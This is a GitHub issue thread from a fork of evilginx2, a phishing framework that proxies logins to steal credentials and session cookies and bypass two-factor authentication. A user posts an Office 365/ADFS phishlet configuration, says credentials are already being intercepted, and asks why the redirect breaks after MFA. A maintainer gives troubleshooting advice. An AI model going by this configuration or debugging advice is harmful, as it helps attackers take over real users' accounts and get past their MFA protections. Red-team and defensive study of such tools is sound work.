search

hash3liZer / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
GNU General Public License v3.0
101 stars 40 forks source link

ADFS redirect error #20

Closed echelonblue closed 3 years ago

echelonblue commented 3 years ago

I did read the readme and are aware about the part no asking for phishlet fixes However, this smell like a bug, So I give it a try:

An O365 test was done on a domain that used its own ADFS.

this ADFS domain was like: sts.somedomain.com. the. relevant sections where changed in the o365 phislet:

Example of the lines 13 until 21 are as follows:

  #    sts.somedomain.com = adfs.example.com
  - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com', session: true, is_landing:false}
  - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com:443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  - {triggers_on: 'sts.somedomain.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:

The EnginX server was executed and forwards to the ADFS site. creds like account and password are intercepted. However. The following error is the result after the MFA code is submitted: 

https://somedomain.com/adfs/services/trust' does not exist.

Looks something goes wrong with redirecthing.

Any solutions?

JamesCullum commented 3 years ago

Where does this error come up? In the console or on the O365 website?

echelonblue commented 3 years ago

The office 365 website. See error

JamesCullum commented 3 years ago

Then this looks like an issue with the phishlet and/or your configuration. Basically you need to make sure that the redirect is rewritten properly. Depending on the context, not rewriting it at the last step can be helpful if you want to forward the user to the real website and already captured all you need.